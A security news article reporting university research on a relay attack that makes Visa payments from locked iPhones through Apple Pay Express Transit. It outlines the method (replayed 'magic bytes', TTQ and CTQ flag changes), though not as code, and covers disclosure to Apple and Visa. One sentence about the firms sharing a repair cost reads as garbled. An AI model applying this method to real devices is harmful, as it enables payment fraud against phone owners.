Apple Pay with VISA Allows Malicious Actors to Force Payments on Locked iPhone Devices
A Way to Make Fraudulent Payments Using Apple Pay from A Locked iPhone Was Discovered.
The researchers from the University of Birmingham and the University of Surrey discovered the fact that iPhone devices are able to confirm transactions under certain conditions.
Unfortunately, it can be considered that this method is similar to a digital version of pickpocketing, as it is able to function over the air even if the iPhone is in a bag or in someone’s pocket and there is no transaction limit.
How Does It Work?
Usually, in order for a payment to go through, an iPhone user needs to authorize it by unlocking the phone using the Face ID, Touch ID, or a passcode.
Unlocking the smartphone, however, might make the payment procedure more difficult for the user in specific situations, such as paying for public transit.
Apple Pay addressed the issue with Express Transit, a feature that allows a transaction to be completed without the device being unlocked.
Express Transit uses card readers that send a non-standard sequence of bytes to circumvent the Apple Pay lock screen for specialized services like ticket gates.
This feature can be leveraged to bypass the Apple Pay lock screen, and illicitly pay from a locked iPhone, using a Visa card, to any EMV reader, for any amount, without user authorisation.
The researchers used a Proxmark device masquerading as a card reader to interact with the target iPhone and an Android phone with an NFC chip to communicate with a payment terminal to simulate a ticket-barrier transaction.
The approach is an active man-in-the-middle replay and relay attack in which the Proxmark replays the “magic bytes” to the iPhone to fool it into thinking it’s a ticket-gate transaction, obviating the requirement for user authentication to authorize the payment.
The attack, on the other hand, is more difficult. The researchers clarify that in order to allow offline data authentication for online transactions in readers with intermittent connectivity, certain flags must be changed by changing certain bits (e.g. transit system entries).
The attack works by first replaying the Magic Bytes to the iPhone, such that it believes the transaction is happening with a transport EMV reader. Secondly, while relaying the EMV messages, the Terminal Transaction Qualifiers (TTQ), sent by the EMV terminal, need to be modified such that the bits (flags) for Offline Data Authentication (ODA) for Online Authorizations supported and EMV mode supported are set.
The researchers found out they are able to modify the Card Transaction Qualifiers (CTQ) that is responsible for setting contactless transactions limits, in this way being able to trick the card reader into thinking the authentication step on the mobile device has been completed successfully.
The Vulnerability Has Not Been Fixed
According to BleepingComputer, these tests were apparently successful only with iPhone and Visa cards., as when testing with Mastercard, a check was performed to make sure that a locked iPhone accepts transactions only from card readers with a transit merchant code.
The method was also tried with Samsung Pay and the researchers discovered that transactions are always possible with locked Samsung devices, but fortunately the value is always zero and transport providers charge for tickets based on data associated with these transactions.
The findings of this study were provided to Apple and Visa in October 2020 and May 2021, respectively, however, neither company was able to resolve the issue.
Instead, the two firms shared the cost of a repair, thus the vulnerability remains unaddressed and exploitable using off-the-shelf hardware and software.
More details of this research can be found in the paper “Practical EMV Relay Protection,” that will be presented at the 2022 IEEE Symposium on Security and Privacy, that is written by Andreea-Ina Radu and Tom Chothia from the University of Birmingham, and Christopher J.P. Newton, Ioana Boureanu, and Liqun Chen from the University of Surrey.